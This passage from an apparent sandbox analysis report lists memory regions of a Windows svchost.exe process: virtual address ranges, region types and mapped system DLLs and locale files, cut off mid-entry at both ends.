"private_0x000000cb8beb0000" filename = "" Region: id = 2291 start_va = 0xcb8bf00000 end_va = 0xcb8bffffff entry_point = 0x0 region_type = private name = "private_0x000000cb8bf00000" filename = "" Region: id = 2292 start_va = 0xcb8c000000 end_va = 0xcb8c0fffff entry_point = 0x0 region_type = private name = "private_0x000000cb8c000000" filename = "" Region: id = 2293 start_va = 0xcb8c100000 end_va = 0xcb8c1fffff entry_point = 0x0 region_type = private name = "private_0x000000cb8c100000" filename = "" Region: id = 2294 start_va = 0xcb8c900000 end_va = 0xcb8c9fffff entry_point = 0x0 region_type = private name = "private_0x000000cb8c900000" filename = "" Region: id = 2295 start_va = 0xcb8ca00000 end_va = 0xcb8cafffff entry_point = 0x0 region_type = private name = "private_0x000000cb8ca00000" filename = "" Region: id = 2296 start_va = 0xcbfc730000 end_va = 0xcbfc73ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cbfc730000" filename = "" Region: id = 2297 start_va = 0xcbfc740000 end_va = 0xcbfc740fff entry_point = 0xcbfc740000 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 2298 start_va = 0xcbfc750000 end_va = 0xcbfc763fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cbfc750000" filename = "" Region: id = 2299 start_va = 0xcbfc770000 end_va = 0xcbfc7effff entry_point = 0x0 region_type = private name = "private_0x000000cbfc770000" filename = "" Region: id = 2300 start_va = 0xcbfc7f0000 end_va = 0xcbfc7f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cbfc7f0000" filename = "" Region: id = 2301 start_va = 0xcbfc800000 end_va = 0xcbfc800fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cbfc800000" filename = "" Region: id = 2302 start_va = 0xcbfc810000 end_va = 0xcbfc811fff entry_point = 0x0 region_type = private name = "private_0x000000cbfc810000" filename = "" Region: id = 2303 start_va = 0xcbfc820000 end_va = 0xcbfc8ddfff entry_point = 0xcbfc820000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2304 start_va = 0xcbfc960000 end_va = 0xcbfc960fff entry_point = 0x0 region_type = private name = "private_0x000000cbfc960000" filename = "" Region: id = 2305 start_va = 0xcbfc970000 end_va = 0xcbfc970fff entry_point = 0x0 region_type = private name = "private_0x000000cbfc970000" filename = "" Region: id = 2306 start_va = 0xcbfc980000 end_va = 0xcbfc980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cbfc980000" filename = "" Region: id = 2307 start_va = 0xcbfc990000 end_va = 0xcbfc990fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cbfc990000" filename = "" Region: id = 2308 start_va = 0xcbfc9a0000 end_va = 0xcbfc9a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cbfc9a0000" filename = "" Region: id = 2309 start_va = 0xcbfc9b0000 end_va = 0xcbfc9b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cbfc9b0000" filename = "" Region: id = 2310 start_va = 0xcbfc9c0000 end_va = 0xcbfc9ccfff entry_point = 0xcbfc9c0000 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 2311 start_va = 0xcbfc9d0000 end_va = 0xcbfc9d6fff entry_point = 0x0 region_type = private name = "private_0x000000cbfc9d0000" filename = "" Region: id = 2312 start_va = 0xcbfc9e0000 end_va = 0xcbfc9ecfff entry_point = 0xcbfc9e0000 region_type = mapped_file name = "gpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\gpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\gpsvc.dll.mui") Region: id = 2313 start_va = 0xcbfc9f0000 end_va = 0xcbfc9f6fff entry_point = 0x0 region_type = private name = "private_0x000000cbfc9f0000" filename = "" Region: id = 2314 start_va = 0xcbfca00000 end_va = 0xcbfcafffff entry_point = 0x0 region_type = private name = "private_0x000000cbfca00000" filename = "" Region: id = 2315 start_va = 0xcbfcb00000 end_va = 0xcbfcc87fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cbfcb00000" filename = "" Region: id = 2316 start_va = 0xcbfcc90000 end_va = 0xcbfcc93fff entry_point = 0xcbfcc90000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 2317 start_va = 0xcbfcca0000 end_va = 0xcbfcca3fff entry_point = 0xcbfcca0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 2318 start_va = 0xcbfccb0000 end_va = 0xcbfccb6fff entry_point = 0x0 region_type = private name = "private_0x000000cbfccb0000" filename = "" Region: id = 2319 start_va = 0xcbfccc0000 end_va = 0xcbfccd0fff entry_point = 0xcbfccc0000 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 2320 start_va = 0xcbfcce0000 end_va = 0xcbfcce1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cbfcce0000" filename = "" Region: id = 2321 start_va = 0xcbfccf0000 end_va = 0xcbfccf0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cbfccf0000" filename = "" Region: id = 2322 start_va = 0xcbfcd00000 end_va = 0xcbfcdfffff entry_point = 0x0 region_type = private name = "private_0x000000cbfcd00000" filename = "" Region: id = 2323 start_va = 0xcbfce00000 end_va = 0xcbfcf80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cbfce00000" filename = "" Region: id = 2324 start_va = 0xcbfcf90000 end_va = 0xcbfd04ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cbfcf90000" filename = "" Region: id = 2325 start_va = 0xcbfd050000 end_va = 0xcbfd14ffff entry_point = 0x0 region_type = private name = "private_0x000000cbfd050000" filename = "" Region: id = 2326 start_va = 0xcbfd150000 end_va = 0xcbfd1cffff entry_point = 0x0 region_type = private name = "private_0x000000cbfd150000" filename = "" Region: id = 2327 start_va = 0xcbfd1d0000 end_va = 0xcbfd1d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cbfd1d0000" filename = "" Region: id = 2328 start_va = 0xcbfd200000 end_va = 0xcbfd2fffff entry_point = 0x0 region_type = private name = "private_0x000000cbfd200000" filename = "" Region: id = 2329 start_va = 0xcbfd300000 end_va = 0xcbfd3fffff entry_point = 0x0 region_type = private name = "private_0x000000cbfd300000" filename = "" Region: id = 2330 start_va = 0xcbfd400000 end_va = 0xcbfd736fff entry_point = 0xcbfd400000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2331 start_va = 0xcbfd740000 end_va = 0xcbfd83ffff entry_point = 0x0 region_type = private name = "private_0x000000cbfd740000" filename = "" Region: id = 2332 start_va = 0xcbfd840000 end_va = 0xcbfd93ffff entry_point = 0x0 region_type = private name = "private_0x000000cbfd840000" filename = "" Region: id = 2333 start_va = 0xcbfd940000 end_va = 0xcbfda3ffff entry_point = 0x0 region_type = private name = "private_0x000000cbfd940000" filename = "" Region: id = 2334 start_va = 0xcbfda40000 end_va = 0xcbfda82fff entry_point = 0xcbfda40000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000f.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000f.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000f.db") Region: id = 2335 start_va = 0xcbfda90000 end_va = 0xcbfdb1afff entry_point = 0xcbfda90000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 2336 start_va = 0xcbfdb40000 end_va = 0xcbfdc3ffff entry_point = 0x0 region_type = private name = "private_0x000000cbfdb40000" filename = "" Region: id = 2337 start_va = 0xcbfdc40000 end_va = 0xcbfdd3ffff entry_point = 0x0 region_type = private name = "private_0x000000cbfdc40000" filename = "" Region: id = 2338 start_va = 0xcbfdd40000 end_va = 0xcbfddbffff entry_point = 0x0 region_type = private name = "private_0x000000cbfdd40000" filename = "" Region: id = 2339 start_va = 0xcbfdde0000 end_va = 0xcbfdde6fff entry_point = 0x0 region_type = private name = "private_0x000000cbfdde0000" filename = "" Region: id = 2340 start_va = 0xcbfde00000 end_va = 0xcbfdefffff entry_point = 0x0 region_type = private name = "private_0x000000cbfde00000" filename = "" Region: id = 2341 start_va = 0xcbfdf00000 end_va = 0xcbfdffffff entry_point = 0x0 region_type = private name = "private_0x000000cbfdf00000" filename = "" Region: id = 2342 start_va = 0xcbfe000000 end_va = 0xcbfe0fffff entry_point = 0x0 region_type = private name = "private_0x000000cbfe000000" filename = "" Region: id = 2343 start_va = 0xcbfe180000 end_va = 0xcbfe27ffff entry_point = 0x0 region_type = private name = "private_0x000000cbfe180000" filename = "" Region: id = 2344 start_va = 0xcbfe300000 end_va = 0xcbfe37ffff entry_point = 0x0 region_type = private name = "private_0x000000cbfe300000" filename = "" Region: id = 2345 start_va = 0xcbfe380000 end_va = 0xcbfe3fffff entry_point = 0x0 region_type = private name = "private_0x000000cbfe380000" filename = "" Region: id = 2346 start_va = 0xcbfe400000 end_va = 0xcbfe4fffff entry_point = 0x0 region_type = private name = "private_0x000000cbfe400000" filename = "" Region: id = 2347 start_va = 0xcbfe500000 end_va = 0xcbfe5fffff entry_point = 0x0 region_type = private name = "private_0x000000cbfe500000" filename = "" Region: id = 2348 start_va = 0xcbfe600000 end_va = 0xcbfe6fffff entry_point = 0x0 region_type = private name = "private_0x000000cbfe600000" filename = "" Region: id = 2349 start_va = 0xcbfe700000 end_va = 0xcbfe7fffff entry_point = 0x0 region_type = private name = "private_0x000000cbfe700000" filename = "" Region: id = 2350 start_va = 0xcbfe800000 end_va = 0xcbfe8fffff entry_point = 0x0 region_type = private name = "private_0x000000cbfe800000" filename = "" Region: id = 2351 start_va = 0xcbfe980000 end_va = 0xcbfe9fffff entry_point = 0x0 region_type = private name = "private_0x000000cbfe980000" filename = "" Region: id = 2352 start_va = 0xcbfeb80000 end_va = 0xcbfec7ffff entry_point = 0x0 region_type = private name = "private_0x000000cbfeb80000" filename = "" Region: id = 2353 start_va = 0xcbfee00000 end_va = 0xcbfee7ffff entry_point = 0x0 region_type = private name = "private_0x000000cbfee00000" filename = "" Region: id = 2354 start_va = 0xcbfef80000 end_va = 0xcbfeffffff entry_point = 0x0 region_type = private name = "private_0x000000cbfef80000" filename = "" Region: id = 2355 start_va = 0xcbff220000 end_va = 0xcbff226fff entry_point = 0x0 region_type = private name = "private_0x000000cbff220000" filename = "" Region: id = 2356 start_va = 0xcbff300000 end_va = 0xcbff3fffff entry_point = 0x0 region_type = private name = "private_0x000000cbff300000" filename = "" Region: id = 2357 start_va = 0xcbff500000 end_va = 0xcbff57ffff entry_point = 0x0 region_type = private name = "private_0x000000cbff500000" filename = "" Region: id = 2358 start_va = 0xcbff580000 end_va = 0xcbff5fffff entry_point = 0x0 region_type = private name = "private_0x000000cbff580000" filename = "" Region: id = 2359 start_va = 0xcbff600000 end_va = 0xcbff67ffff entry_point = 0x0 region_type = private name = "private_0x000000cbff600000" filename = "" Region: id = 2360 start_va = 0xcbff680000 end_va = 0xcbff77ffff entry_point = 0x0 region_type = private name = "private_0x000000cbff680000" filename = "" Region: id = 2361 start_va = 0xcbff780000 end_va = 0xcbff87ffff entry_point = 0x0 region_type = private name = "private_0x000000cbff780000" filename = "" Region: id = 2362 start_va = 0xcbff900000 end_va = 0xcbff9fffff entry_point = 0x0 region_type = private name = "private_0x000000cbff900000" filename = "" Region: id = 2363 start_va = 0xcbffc00000 end_va = 0xcbffcfffff entry_point = 0x0 region_type = private name = "private_0x000000cbffc00000" filename = "" Region: id = 2364 start_va = 0xcbffd00000 end_va = 0xcbffddefff entry_point = 0xcbffd00000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 2365 start_va = 0x7df5ff400000 end_va = 0x7ff5ff3fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff400000" filename = "" Region: id = 2366 start_va = 0x7ff787418000 end_va = 0x7ff787419fff entry_point = 0x0 region_type = private name = "private_0x00007ff787418000" filename = "" Region: id = 2367 start_va = 0x7ff787420000 end_va = 0x7ff787421fff entry_point = 0x0 region_type = private name = "private_0x00007ff787420000" filename = "" Region: id = 2368 start_va = 0x7ff787422000 end_va = 0x7ff787423fff entry_point = 0x0 region_type = private name = "private_0x00007ff787422000" filename = "" Region: id = 2369 start_va = 0x7ff787424000 end_va = 0x7ff787425fff entry_point = 0x0 region_type = private name = "private_0x00007ff787424000" filename = "" Region: id = 2370 start_va = 0x7ff787432000 end_va = 0x7ff787433fff entry_point = 0x0 region_type = private name = "private_0x00007ff787432000" filename = "" Region: id = 2371 start_va = 0x7ff787434000 end_va = 0x7ff787435fff entry_point = 0x0 region_type = private name = "private_0x00007ff787434000" filename = "" Region: id = 2372 start_va = 0x7ff787438000 end_va = 0x7ff787439fff entry_point = 0x0 region_type = private name = "private_0x00007ff787438000" filename = "" Region: id = 2373 start_va = 0x7ff78743c000 end_va = 0x7ff78743dfff entry_point = 0x0 region_type = private name = "private_0x00007ff78743c000" filename = "" Region: id = 2374 start_va = 0x7ff78743e000 end_va = 0x7ff78743ffff entry_point = 0x0 region_type = private name = "private_0x00007ff78743e000" filename = "" Region: id = 2375 start_va = 0x7ff787440000 end_va = 0x7ff787441fff entry_point = 0x0 region_type = private name = "private_0x00007ff787440000" filename = "" Region: id = 2376 start_va = 0x7ff787444000 end_va = 0x7ff787445fff entry_point = 0x0 region_type = private name = "private_0x00007ff787444000" filename = "" Region: id = 2377 start_va = 0x7ff78744a000 end_va = 0x7ff78744bfff entry_point = 0x0 region_type = private name = "private_0x00007ff78744a000" filename = "" Region: id = 2378 start_va = 0x7ff78744c000 end_va = 0x7ff78744dfff entry_point = 0x0 region_type = private name = "private_0x00007ff78744c000" filename = "" Region: id = 2379 start_va = 0x7ff787450000 end_va = 0x7ff787451fff entry_point = 0x0 region_type = private name = "private_0x00007ff787450000" filename = "" Region: id = 2380 start_va = 0x7ff787456000 end_va = 0x7ff787457fff entry_point = 0x0 region_type = private name = "private_0x00007ff787456000" filename = "" Region: id = 2381 start_va = 0x7ff787458000 end_va = 0x7ff787459fff entry_point = 0x0 region_type = private name = "private_0x00007ff787458000" filename = "" Region: id = 2382 start_va = 0x7ff78745a000 end_va = 0x7ff78745bfff entry_point = 0x0 region_type = private name = "private_0x00007ff78745a000" filename = "" Region: id = 2383 start_va = 0x7ff78745c000 end_va = 0x7ff78745dfff entry_point = 0x0 region_type = private name = "private_0x00007ff78745c000" filename = "" Region: id = 2384 start_va = 0x7ff787462000 end_va = 0x7ff787463fff entry_point = 0x0 region_type = private name = "private_0x00007ff787462000" filename = "" Region: id = 2385 start_va = 0x7ff787468000 end_va = 0x7ff787469fff entry_point = 0x0 region_type = private name = "private_0x00007ff787468000" filename = "" Region: id = 2386 start_va = 0x7ff78746c000 end_va = 0x7ff78746dfff entry_point = 0x0 region_type = private name = "private_0x00007ff78746c000" filename = "" Region: id = 2387 start_va = 0x7ff78746e000 end_va = 0x7ff78746ffff entry_point = 0x0 region_type = private name = "private_0x00007ff78746e000" filename = "" Region: id = 2388 start_va = 0x7ff787470000 end_va = 0x7ff787471fff entry_point = 0x0 region_type = private name = "private_0x00007ff787470000" filename = "" Region: id = 2389 start_va = 0x7ff787472000 end_va = 0x7ff787473fff entry_point = 0x0 region_type = private name = "private_0x00007ff787472000" filename = "" Region: id = 2390 start_va = 0x7ff787474000 end_va = 0x7ff787475fff entry_point = 0x0 region_type = private name = "private_0x00007ff787474000" filename = "" Region: id = 2391 start_va = 0x7ff78747c000 end_va = 0x7ff78747dfff entry_point = 0x0 region_type = private name = "private_0x00007ff78747c000" filename = "" Region: id = 2392 start_va = 0x7ff787480000 end_va = 0x7ff787481fff entry_point = 0x0 region_type = private name = "private_0x00007ff787480000" filename = "" Region: id = 2393 start_va = 0x7ff787486000 end_va = 0x7ff787487fff entry_point = 0x0 region_type = private name = "private_0x00007ff787486000" filename = "" Region: id = 2394 start_va = 0x7ff78748c000 end_va = 0x7ff78748dfff entry_point = 0x0 region_type = private name = "private_0x00007ff78748c000" filename = "" Region: id = 2395 start_va = 0x7ff78748e000 end_va = 0x7ff78748ffff entry_point = 0x0 region_type = private name = "private_0x00007ff78748e000" filename = "" Region: id = 2396 start_va = 0x7ff787490000 end_va = 0x7ff787491fff entry_point = 0x0 region_type = private name = "private_0x00007ff787490000" filename = "" Region: id = 2397 start_va = 0x7ff787492000 end_va = 0x7ff787493fff entry_point = 0x0 region_type = private name = "private_0x00007ff787492000" filename = "" Region: id = 2398 start_va = 0x7ff787494000 end_va = 0x7ff787495fff entry_point = 0x0 region_type = private name = "private_0x00007ff787494000" filename = "" Region: id = 2399 start_va = 0x7ff787496000 end_va = 0x7ff787497fff entry_point = 0x0 region_type = private name = "private_0x00007ff787496000" filename = "" Region: id = 2400 start_va = 0x7ff78749a000 end_va = 0x7ff78749bfff entry_point = 0x0 region_type = private name = "private_0x00007ff78749a000" filename = "" Region: id = 2401 start_va = 0x7ff78749c000 end_va = 0x7ff78749dfff entry_point = 0x0 region_type = private name = "private_0x00007ff78749c000" filename = "" Region: id = 2402 start_va = 0x7ff78749e000 end_va = 0x7ff78749ffff entry_point = 0x0 region_type = private name = "private_0x00007ff78749e000" filename = "" Region: id = 2403 start_va = 0x7ff7874a0000 end_va = 0x7ff7874a1fff entry_point = 0x0 region_type = private name = "private_0x00007ff7874a0000" filename = "" Region: id = 2404 start_va = 0x7ff7874a2000 end_va = 0x7ff7874a3fff entry_point = 0x0 region_type = private name = "private_0x00007ff7874a2000" filename = "" Region: id = 2405 start_va = 0x7ff7874a4000 end_va = 0x7ff7874a5fff entry_point = 0x0 region_type = private name = "private_0x00007ff7874a4000" filename = "" Region: id = 2406 start_va = 0x7ff7874a6000 end_va = 0x7ff7874a7fff entry_point = 0x0 region_type = private name = "private_0x00007ff7874a6000" filename = "" Region: id = 2407 start_va = 0x7ff7874a8000 end_va = 0x7ff7874a9fff entry_point = 0x0 region_type = private name = "private_0x00007ff7874a8000" filename = "" Region: id = 2408 start_va = 0x7ff7874aa000 end_va = 0x7ff7874abfff entry_point = 0x0 region_type = private name = "private_0x00007ff7874aa000" filename = "" Region: id = 2409 start_va = 0x7ff7874ac000 end_va = 0x7ff7874adfff entry_point = 0x0 region_type = private name = "private_0x00007ff7874ac000" filename = "" Region: id = 2410 start_va = 0x7ff7874ae000 end_va = 0x7ff7874affff entry_point = 0x0 region_type = private name = "private_0x00007ff7874ae000" filename = "" Region: id = 2411 start_va = 0x7ff7874b0000 end_va = 0x7ff7875affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7874b0000" filename = "" Region: id = 2412 start_va = 0x7ff7875b0000 end_va = 0x7ff7875d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7875b0000" filename = "" Region: id = 2413 start_va = 0x7ff7875d4000 end_va = 0x7ff7875d4fff entry_point = 0x0 region_type = private name = "private_0x00007ff7875d4000" filename = "" Region: id = 2414 start_va = 0x7ff7875d6000 end_va = 0x7ff7875d7fff entry_point = 0x0 region_type = private name = "private_0x00007ff7875d6000" filename = "" Region: id = 2415 start_va = 0x7ff7875d8000 end_va = 0x7ff7875d9fff entry_point = 0x0 region_type = private name = "private_0x00007ff7875d8000" filename = "" Region: id = 2416 start_va = 0x7ff7875da000 end_va = 0x7ff7875dbfff entry_point = 0x0 region_type = private name = "private_0x00007ff7875da000" filename = "" Region: id = 2417 start_va = 0x7ff7875dc000 end_va = 0x7ff7875ddfff entry_point = 0x0 region_type = private name = "private_0x00007ff7875dc000" filename = "" Region: id = 2418 start_va = 0x7ff7875de000 end_va = 0x7ff7875dffff entry_point = 0x0 region_type = private name = "private_0x00007ff7875de000" filename = "" Region: id = 2419 start_va = 0x7ff787ec0000 end_va = 0x7ff787eccfff entry_point = 0x7ff787ec0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 2420 start_va = 0x7ffade830000 end_va = 0x7ffadeadffff entry_point = 0x7ffade830000 region_type = mapped_file name = "netshell.dll" filename = "\\Windows\\System32\\netshell.dll" (normalized: "c:\\windows\\system32\\netshell.dll") Region: id = 2421 start_va = 0x7ffadf920000 end_va = 0x7ffadf9e3fff entry_point = 0x7ffadf920000 region_type = mapped_file name = "wuapi.dll" filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll") Region: id = 2422 start_va = 0x7ffadfb10000 end_va = 0x7ffadfd39fff entry_point = 0x7ffadfb10000 region_type = mapped_file name = "wuaueng.dll" filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll") Region: id = 2423 start_va = 0x7ffae00d0000 end_va = 0x7ffae0129fff entry_point = 0x7ffae00d0000 region_type = mapped_file name = "usocore.dll" filename = "\\Windows\\System32\\usocore.dll" (normalized: "c:\\windows\\system32\\usocore.dll") Region: id = 2424 start_va = 0x7ffae1820000 end_va = 0x7ffae18a3fff entry_point = 0x7ffae1820000 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 2425 start_va = 0x7ffae60a0000 end_va = 0x7ffae60b1fff entry_point = 0x7ffae60a0000 region_type = mapped_file name = "bitsproxy.dll" filename = "\\Windows\\System32\\BitsProxy.dll" (normalized: "c:\\windows\\system32\\bitsproxy.dll") Region: id = 2426 start_va = 0x7ffae6330000 end_va = 0x7ffae6395fff entry_point = 0x7ffae6330000 region_type = mapped_file name = "upnp.dll" filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll") Region: id = 2427 start_va = 0x7ffae63a0000 end_va = 0x7ffae63b2fff entry_point = 0x7ffae63a0000 region_type = mapped_file name = "bitsigd.dll" filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll") Region: id = 2428 start_va = 0x7ffae63c0000 end_va = 0x7ffae63cafff entry_point = 0x7ffae63c0000 region_type = mapped_file name = "bitsperf.dll" filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll") Region: id = 2429 start_va = 0x7ffae63d0000 end_va = 0x7ffae64f0fff entry_point = 0x7ffae63d0000 region_type = mapped_file name = "qmgr.dll" filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll") Region: id = 2430 start_va = 0x7ffae8b60000 end_va = 0x7ffae8fc9fff entry_point = 0x7ffae8b60000 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 2431 start_va = 0x7ffae9240000 end_va = 0x7ffae92c2fff entry_point = 0x7ffae9240000 region_type = mapped_file name = "wbemess.dll" filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll") Region: id = 2432 start_va = 0x7ffae92d0000 end_va = 0x7ffae92e5fff entry_point = 0x7ffae92d0000 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 2433 start_va = 0x7ffae92f0000 end_va = 0x7ffae93c7fff entry_point = 0x7ffae92f0000 region_type = mapped_file name = "wmiprvsd.dll" filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll") Region: id = 2434 start_va = 0x7ffae93d0000 end_va = 0x7ffae9432fff entry_point = 0x7ffae93d0000 region_type = mapped_file name = "repdrvfs.dll" filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll") Region: id = 2435 start_va = 0x7ffae9440000 end_va = 0x7ffae9464fff entry_point = 0x7ffae9440000 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 2436 start_va = 0x7ffae9470000 end_va = 0x7ffae9483fff entry_point = 0x7ffae9470000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 2437 start_va = 0x7ffae9490000 end_va = 0x7ffae9587fff entry_point = 0x7ffae9490000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 2438 start_va = 0x7ffae9590000 end_va = 0x7ffae9602fff entry_point = 0x7ffae9590000 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 2439 start_va = 0x7ffae9610000 end_va = 0x7ffae9746fff entry_point = 0x7ffae9610000 region_type = mapped_file name = "wbemcore.dll" filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll") Region: id = 2440 start_va = 0x7ffae9770000 end_va = 0x7ffae9797fff entry_point = 0x7ffae9770000 region_type = mapped_file name = "dssenh.dll" filename = "\\Windows\\System32\\dssenh.dll" (normalized: "c:\\windows\\system32\\dssenh.dll") Region: id = 2441 start_va = 0x7ffae9fa0000 end_va = 0x7ffae9fb0fff entry_point = 0x7ffae9fa0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 2442 start_va = 0x7ffae9fc0000 end_va = 0x7ffae9fd0fff entry_point = 0x7ffae9fc0000 region_type = mapped_file name = "tetheringclient.dll" filename = "\\Windows\\System32\\tetheringclient.dll" (normalized: "c:\\windows\\system32\\tetheringclient.dll") Region: id = 2443 start_va = 0x7ffae9fe0000 end_va = 0x7ffaea05ffff entry_point = 0x7ffae9fe0000 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 2444 start_va = 0x7ffaea0a0000 end_va = 0x7ffaea11ffff entry_point = 0x7ffaea0a0000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 2445 start_va = 0x7ffaea5c0000 end_va = 0x7ffaea5d0fff entry_point = 0x7ffaea5c0000 region_type = mapped_file name = "credentialmigrationhandler.dll" filename = "\\Windows\\System32\\CredentialMigrationHandler.dll" (normalized: "c:\\windows\\system32\\credentialmigrationhandler.dll") Region: id = 2446 start_va = 0x7ffaea5e0000 end_va = 0x7ffaea856fff entry_point = 0x7ffaea5e0000 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 2447 start_va = 0x7ffaea860000 end_va = 0x7ffaea876fff entry_point = 0x7ffaea860000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 2448 start_va = 0x7ffaea880000 end_va = 0x7ffaea8c5fff entry_point = 0x7ffaea880000 region_type = mapped_file name = "adsldp.dll" filename = "\\Windows\\System32\\adsldp.dll" (normalized: "c:\\windows\\system32\\adsldp.dll") Region: id = 2449 start_va = 0x7ffaea8d0000 end_va = 0x7ffaea90ffff entry_point = 0x7ffaea8d0000 region_type = mapped_file name = "adsldpc.dll" filename = "\\Windows\\System32\\adsldpc.dll" (normalized: "c:\\windows\\system32\\adsldpc.dll") Region: id = 2450 start_va = 0x7ffaea910000 end_va = 0x7ffaea957fff entry_point = 0x7ffaea910000 region_type = mapped_file name = "activeds.dll" filename = "\\Windows\\System32\\activeds.dll" (normalized: "c:\\windows\\system32\\activeds.dll") Region: id = 2451 start_va = 0x7ffaea980000 end_va = 0x7ffaea994fff entry_point = 0x7ffaea980000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 2452 start_va = 